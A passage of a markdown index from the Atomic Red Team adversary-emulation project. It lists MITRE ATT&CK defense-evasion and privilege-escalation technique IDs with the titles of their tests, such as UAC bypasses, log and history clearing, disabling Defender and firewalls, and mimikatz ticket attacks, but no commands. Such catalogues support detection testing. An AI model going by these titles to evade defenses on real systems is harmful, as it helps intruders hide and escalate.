- Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
- Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
- Atomic Test #23: UAC Bypass with WSReset Registry Modification [windows]
- T1099 Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1116 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.013 Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1093 Process Hollowing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.005 Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md)
- Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux]
- Atomic Test #2: Masquerade as a built-in system executable [windows]
- T1600 Weaken Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.008 Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1121 Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564 Hide Artifacts](../../T1564/T1564.md)
- Atomic Test #1: Extract binary files via VBA [windows]
- Atomic Test #2: Create a Hidden User Called "$" [windows]
- Atomic Test #3: Create an "Administrator " user (with a space on the end) [windows]
- Atomic Test #4: Create and Hide a Service with sc.exe [windows]
- [T1484.002 Domain Trust Modification](../../T1484.002/T1484.002.md)
- Atomic Test #1: Add Federation to Azure AD [azure-ad]
- T1527 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.009 Safe Mode Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.005 TFTP Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
- Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
- Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
- Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
- Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1070.002 Indicator Removal on Host: Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md)
- Atomic Test #1: rm -rf [macos, linux]
- Atomic Test #2: Delete log files using built-in log utility [macos]
- Atomic Test #3: Truncate system log files via truncate utility [macos]
- Atomic Test #4: Delete log files via cat utility by appending /dev/null or /dev/zero [macos]
- Atomic Test #5: System log file deletion via find utility [macos]
- Atomic Test #6: Overwrite macOS system log via echo utility [macos]
- Atomic Test #7: Real-time system log clearance/deletion [macos]
- Atomic Test #8: Delete system log files via unlink utility [macos]
- Atomic Test #9: Delete system log files using shred utility [macos]
- Atomic Test #10: Delete system log files using srm utility [macos]
- Atomic Test #11: Delete system log files using OSAScript [macos]
- Atomic Test #12: Delete system log files using Applescript [macos]
- Atomic Test #13: Delete system journal logs via rm and journalctl utilities [linux]
- Atomic Test #14: Overwrite Linux Mail Spool [linux]
- Atomic Test #15: Overwrite Linux Log [linux]
- [T1218.004 Signed Binary Proxy Execution: InstallUtil](../../T1218.004/T1218.004.md)
- Atomic Test #1: CheckIfInstallable method call [windows]
- Atomic Test #2: InstallHelper method call [windows]
- Atomic Test #3: InstallUtil class constructor method call [windows]
- Atomic Test #4: InstallUtil Install method call [windows]
- Atomic Test #5: InstallUtil Uninstall method call - /U variant [windows]
- Atomic Test #6: InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant [windows]
- Atomic Test #7: InstallUtil HelpText method call [windows]
- Atomic Test #8: InstallUtil evasive invocation [windows]
- T1089 Disabling Security Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- [T1553.001 Subvert Trust Controls: Gatekeeper Bypass](../../T1553.001/T1553.001.md)
- Atomic Test #1: Gatekeeper Bypass [macos]
- T1553.002 Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md)
- Atomic Test #1: Take ownership using takeown utility [windows]
- Atomic Test #2: cacls - Grant permission to specified user or group recursively [windows]
- Atomic Test #3: attrib - Remove read-only attribute [windows]
- Atomic Test #4: attrib - hide file [windows]
- Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
- [T1218.007 Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md)
- Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #2: Msiexec.exe - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #3: Msiexec.exe - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #4: Msiexec.exe - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #5: WMI Win32_Product Class - Execute Local MSI file with embedded JScript [windows]
- Atomic Test #6: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript [windows]
- Atomic Test #7: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL [windows]
- Atomic Test #8: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE [windows]
- Atomic Test #9: Msiexec.exe - Execute the DllRegisterServer function of a DLL [windows]
- Atomic Test #10: Msiexec.exe - Execute the DllUnregisterServer function of a DLL [windows]
- Atomic Test #11: Msiexec.exe - Execute Remote MSI file [windows]
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1070.007 Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1600.001 Reduce Key Space [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.003 Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md)
- Atomic Test #1: Clear Bash history (rm) [linux, macos]
- Atomic Test #2: Clear Bash history (echo) [linux]
- Atomic Test #3: Clear Bash history (cat dev/null) [linux, macos]
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
- Atomic Test #5: Clear Bash history (truncate) [linux]
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
- Atomic Test #7: Clear and Disable Bash History Logging [linux, macos]
- Atomic Test #8: Use Space Before Command to Avoid Logging to History [linux, macos]
- Atomic Test #9: Disable Bash History Logging with SSH -T [linux]
- Atomic Test #10: Prevent Powershell History Logging [windows]
- Atomic Test #11: Clear Powershell History by Deleting History File [windows]
- Atomic Test #12: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
- [T1202 Indirect Command Execution](../../T1202/T1202.md)
- Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
- Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
- Atomic Test #3: Indirect Command Execution - conhost.exe [windows]
- T1536 Revert Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1140 Deobfuscate/Decode Files or Information](../../T1140/T1140.md)
- Atomic Test #1: Deobfuscate/Decode Files Or Information [windows]
- Atomic Test #2: Certutil Rename and Decode [windows]
- Atomic Test #3: Base64 decoding with Python [linux, macos]
- Atomic Test #4: Base64 decoding with Perl [linux, macos]
- Atomic Test #5: Base64 decoding with shell utilities [linux, macos]
- Atomic Test #6: Hex decoding with shell utilities [linux, macos]
- Atomic Test #7: Linux Base64 Encoded Shebang in CLI [linux, macos]
- Atomic Test #8: XOR decoding and command execution using Python [linux, macos]
- [T1562 Impair Defenses](../../T1562/T1562.md)
- Atomic Test #1: Windows Disable LSA Protection [windows]
- Atomic Test #2: Disable journal logging via systemctl utility [linux]
- Atomic Test #3: Disable journal logging via sed utility [linux]
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
- Atomic Test #1: Thread Execution Hijacking [windows]
- [T1036 Masquerading](../../T1036/T1036.md)
- Atomic Test #1: System File Copied to Unusual Location [windows]
- Atomic Test #2: Malware Masquerading and Execution from Zip File [windows]
- [T1070.008 Email Collection: Mailbox Manipulation](../../T1070.008/T1070.008.md)
- Atomic Test #1: Copy and Delete Mailbox Data on Windows [windows]
- Atomic Test #2: Copy and Delete Mailbox Data on Linux [linux]
- Atomic Test #3: Copy and Delete Mailbox Data on macOS [macos]
- Atomic Test #4: Copy and Modify Mailbox Data on Windows [windows]
- Atomic Test #5: Copy and Modify Mailbox Data on Linux [linux]
- Atomic Test #6: Copy and Modify Mailbox Data on macOS [macos]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- Atomic Test #3: Section View Injection [windows]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
- Atomic Test #1: mavinject - Inject DLL into running process [windows]
- Atomic Test #2: Register-CimProvider - Execute evil dll [windows]
- Atomic Test #3: InfDefaultInstall.exe .inf Execution [windows]
- Atomic Test #4: ProtocolHandler.exe Downloaded a Suspicious File [windows]
- Atomic Test #5: Microsoft.Workflow.Compiler.exe Payload Execution [windows]
- Atomic Test #6: Renamed Microsoft.Workflow.Compiler.exe Payload Executions [windows]
- Atomic Test #7: Invoke-ATHRemoteFXvGPUDisablementCommand base test [windows]
- Atomic Test #8: DiskShadow Command Execution [windows]
- Atomic Test #9: Load Arbitrary DLL via Wuauclt (Windows Update Client) [windows]
- Atomic Test #10: Lolbin Gpscript logon option [windows]
- Atomic Test #11: Lolbin Gpscript startup option [windows]
- Atomic Test #12: Lolbas ie4uinit.exe use as proxy [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
- Atomic Test #1: Set a file's access timestamp [linux, macos]
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
- Atomic Test #3: Set a file's creation timestamp [linux, macos]
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
- Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
- Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
- Atomic Test #7: Windows - Modify file last access timestamp with PowerShell [windows]
- Atomic Test #8: Windows - Timestomp a File [windows]
- [T1620 Reflective Code Loading](../../T1620/T1620.md)
- Atomic Test #1: WinPwn - Reflectively load Mimik@tz into memory [windows]
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.003 Signed Binary Proxy Execution: CMSTP](../../T1218.003/T1218.003.md)
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
- [T1562.002 Impair Defenses: Disable Windows Event Logging](../../T1562.002/T1562.002.md)
- Atomic Test #1: Disable Windows IIS HTTP Logging [windows]
- Atomic Test #2: Disable Windows IIS HTTP Logging via PowerShell [windows]
- Atomic Test #3: Kill Event Log Service Threads [windows]
- Atomic Test #4: Impair Windows Audit Log Policy [windows]
- Atomic Test #5: Clear Windows Audit Policy Config [windows]
- Atomic Test #6: Disable Event Logging with wevtutil [windows]
- Atomic Test #7: Makes Eventlog blind with Phant0m [windows]
- [T1218.002 Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md)
- Atomic Test #1: Control Panel Items [windows]
- T1599.001 Network Address Translation Traversal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1009 Binary Padding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.004 Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md)
- Atomic Test #1: Disable Microsoft Defender Firewall [windows]
- Atomic Test #2: Disable Microsoft Defender Firewall via Registry [windows]
- Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows]
- Atomic Test #4: Opening ports for proxy - HARDRAIN [windows]
- Atomic Test #5: Open a local port through Windows Firewall to any profile [windows]
- Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows]
- Atomic Test #7: Stop/Start UFW firewall [linux]
- Atomic Test #8: Stop/Start UFW firewall systemctl [linux]
- Atomic Test #9: Turn off UFW logging [linux]
- Atomic Test #10: Add and delete UFW firewall rules [linux]
- Atomic Test #11: Edit UFW firewall user.rules file [linux]
- Atomic Test #12: Edit UFW firewall ufw.conf file [linux]
- Atomic Test #13: Edit UFW firewall sysctl.conf file [linux]
- Atomic Test #14: Edit UFW firewall main configuration file [linux]
- Atomic Test #15: Tail the UFW firewall log file [linux]
- Atomic Test #16: Disable iptables [linux]
- Atomic Test #17: Modify/delete iptables firewall rules [linux]
- Atomic Test #18: LockBit Black - Unusual Windows firewall registry modification -cmd [windows]
- Atomic Test #19: LockBit Black - Unusual Windows firewall registry modification -Powershell [windows]
- Atomic Test #20: Blackbit - Disable Windows Firewall using netsh firewall [windows]
- T1152 Launchctl [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553.003 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1207 Rogue Domain Controller](../../T1207/T1207.md)
- Atomic Test #1: DCShadow (Active Directory) [windows]
- T1553.006 Code Signing Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1610 Deploy a container](../../T1610/T1610.md)
- Atomic Test #1: Deploy Docker container [containers]
- T1107 File Deletion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1112 Modify Registry](../../T1112/T1112.md)
- Atomic Test #1: Modify Registry of Current User Profile - cmd [windows]
- Atomic Test #2: Modify Registry of Local Machine - cmd [windows]
- Atomic Test #3: Modify registry to store logon credentials [windows]
- Atomic Test #4: Add domain to Trusted sites Zone [windows]
- Atomic Test #5: Javascript in registry [windows]
- Atomic Test #6: Change Powershell Execution Policy to Bypass [windows]
- Atomic Test #7: BlackByte Ransomware Registry Changes - CMD [windows]
- Atomic Test #8: BlackByte Ransomware Registry Changes - Powershell [windows]
- Atomic Test #9: Disable Windows Registry Tool [windows]
- Atomic Test #10: Disable Windows CMD application [windows]
- Atomic Test #11: Disable Windows Task Manager application [windows]
- Atomic Test #12: Disable Windows Notification Center [windows]
- Atomic Test #13: Disable Windows Shutdown Button [windows]
- Atomic Test #14: Disable Windows LogOff Button [windows]
- Atomic Test #15: Disable Windows Change Password Feature [windows]
- Atomic Test #16: Disable Windows Lock Workstation Feature [windows]
- Atomic Test #17: Activate Windows NoDesktop Group Policy Feature [windows]
- Atomic Test #18: Activate Windows NoRun Group Policy Feature [windows]
- Atomic Test #19: Activate Windows NoFind Group Policy Feature [windows]
- Atomic Test #20: Activate Windows NoControlPanel Group Policy Feature [windows]
- Atomic Test #21: Activate Windows NoFileMenu Group Policy Feature [windows]
- Atomic Test #22: Activate Windows NoClose Group Policy Feature [windows]
- Atomic Test #23: Activate Windows NoSetTaskbar Group Policy Feature [windows]
- Atomic Test #24: Activate Windows NoTrayContextMenu Group Policy Feature [windows]
- Atomic Test #25: Activate Windows NoPropertiesMyDocuments Group Policy Feature [windows]
- Atomic Test #26: Hide Windows Clock Group Policy Feature [windows]
- Atomic Test #27: Windows HideSCAHealth Group Policy Feature [windows]
- Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows]
- Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows]
- Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows]
- Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows]
- Atomic Test #32: Windows Powershell Logging Disabled [windows]
- Atomic Test #33: Windows Add Registry Value to Load Service in Safe Mode without Network [windows]
- Atomic Test #34: Windows Add Registry Value to Load Service in Safe Mode with Network [windows]
- Atomic Test #35: Disable Windows Toast Notifications [windows]
- Atomic Test #36: Disable Windows Security Center Notifications [windows]
- Atomic Test #37: Suppress Win Defender Notifications [windows]
- Atomic Test #38: Allow RDP Remote Assistance Feature [windows]
- Atomic Test #39: NetWire RAT Registry Key Creation [windows]
- Atomic Test #40: Ursnif Malware Registry Key Creation [windows]
- Atomic Test #41: Terminal Server Client Connection History Cleared [windows]
- Atomic Test #42: Disable Windows Error Reporting Settings [windows]
- Atomic Test #43: DisallowRun Execution Of Certain Applications [windows]
- Atomic Test #44: Enabling Restricted Admin Mode via Command_Prompt [windows]
- Atomic Test #45: Mimic Ransomware - Enable Multiple User Sessions [windows]
- Atomic Test #46: Mimic Ransomware - Allow Multiple RDP Sessions per User [windows]
- Atomic Test #47: Event Viewer Registry Modification - Redirection URL [windows]
- Atomic Test #48: Event Viewer Registry Modification - Redirection Program [windows]
- Atomic Test #49: Enabling Remote Desktop Protocol via Remote Registry [windows]
- Atomic Test #50: Disable Win Defender Notification [windows]
- Atomic Test #51: Disable Windows OS Auto Update [windows]
- Atomic Test #52: Disable Windows Auto Reboot for current logon user [windows]
- Atomic Test #53: Windows Auto Update Option to Notify before download [windows]
- Atomic Test #54: Do Not Connect To Win Update [windows]
- Atomic Test #55: Tamper Win Defender Protection [windows]
- Atomic Test #56: Snake Malware Registry Blob [windows]
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.001 Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md)
- Atomic Test #1: Pad Binary to Change Hash - Linux/macOS dd [macos, linux]
- Atomic Test #2: Pad Binary to Change Hash using truncate command - Linux/macOS [macos, linux]
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- Atomic Test #3: Enable Guest Account on macOS [macos]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1085 Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- Atomic Test #3: Dylib Injection via DYLD_INSERT_LIBRARIES [macos]
- [T1070.001 Indicator Removal on Host: Clear Windows Event Logs](../../T1070.001/T1070.001.md)
- Atomic Test #1: Clear Logs [windows]
- Atomic Test #2: Delete System Logs Using Clear-EventLog [windows]
- Atomic Test #3: Clear Event Logs via VBA [windows]
- T1222 File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- Atomic Test #6: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #7: Do reconnaissance for files that have the setgid bit set [linux]
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1054 Indicator Blocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.008 Signed Binary Proxy Execution: Odbcconf](../../T1218.008/T1218.008.md)
- Atomic Test #1: Odbcconf.exe - Execute Arbitrary DLL [windows]
- Atomic Test #2: Odbcconf.exe - Load Response File [windows]
- T1144 Gatekeeper Bypass [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1045 Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1578.003 Delete Cloud Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.006 Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md)
- Atomic Test #1: Auditing Configuration Changes on Linux Host [linux]
- Atomic Test #2: Logging Configuration Changes on Linux Host [linux]
- Atomic Test #3: Disable Powershell ETW Provider - Windows [windows]
- Atomic Test #4: Disable .NET Event Tracing for Windows Via Registry (cmd) [windows]
- Atomic Test #5: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
- Atomic Test #6: LockBit Black - Disable the ETW Provider of Windows Defender -cmd [windows]
- Atomic Test #7: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell [windows]
- T1562.007 Disable or Modify Cloud Firewall [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070 Indicator Removal on Host](../../T1070/T1070.md)
- Atomic Test #1: Indicator Removal using FSUtil [windows]
- [T1550.003 Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md)
- Atomic Test #1: Mimikatz Kerberos Ticket Attack [windows]
- Atomic Test #2: Rubeus Kerberos Pass The Ticket [windows]
- [T1036.004 Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #1: Creating W32Time similar named service using schtasks [windows]
- Atomic Test #2: Creating W32Time similar named service using sc [windows]
- Atomic Test #3: linux rename /proc/pid/comm using prctl [linux]
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- [T1647 Plist File Modification](../../T1647/T1647.md)
- Atomic Test #1: Plist Modification [macos]
- T1191 CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
- Atomic Test #1: Mount ISO image [windows]
- Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
- Atomic Test #3: Remove the Zone.Identifier alternate data stream [windows]
- Atomic Test #4: Execute LNK file from ISO [windows]
- T1600.002 Disable Crypto Hardware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1612 Build Image on Host](../../T1612/T1612.md)
- Atomic Test #1: Build Image On Host [containers]
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1218.012 Verclsid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.005 Signed Binary Proxy Execution: Mshta](../../T1218.005/T1218.005.md)
- Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows]
- Atomic Test #2: Mshta executes VBScript to execute malicious command [windows]
- Atomic Test #3: Mshta Executes Remote HTML Application (HTA) [windows]
- Atomic Test #4: Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement [windows]
- Atomic Test #5: Invoke HTML Application - Jscript Engine Simulating Double Click [windows]
- Atomic Test #6: Invoke HTML Application - Direct download from URI [windows]
- Atomic Test #7: Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler [windows]
- Atomic Test #8: Invoke HTML Application - JScript Engine with Inline Protocol Handler [windows]
- Atomic Test #9: Invoke HTML Application - Simulate Lateral Movement over UNC Path [windows]
- Atomic Test #10: Mshta used to Execute PowerShell [windows]
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.001 Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- Atomic Test #3: Launch NSudo Executable [windows]
- Atomic Test #4: Bad Potato [windows]
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.002 Hide Artifacts: Hidden Users](../../T1564.002/T1564.002.md)
- Atomic Test #1: Create Hidden User using UniqueID < 500 [macos]
- Atomic Test #2: Create Hidden User using IsHidden option [macos]
- Atomic Test #3: Create Hidden User in Registry [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- Atomic Test #3: Clear bash history [linux]
- Atomic Test #4: Setting the HISTCONTROL environment variable [linux]
- Atomic Test #5: Setting the HISTFILESIZE environment variable [linux]
- Atomic Test #6: Setting the HISTFILE environment variable [linux]
- Atomic Test #7: Setting the HISTIGNORE environment variable [linux]
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
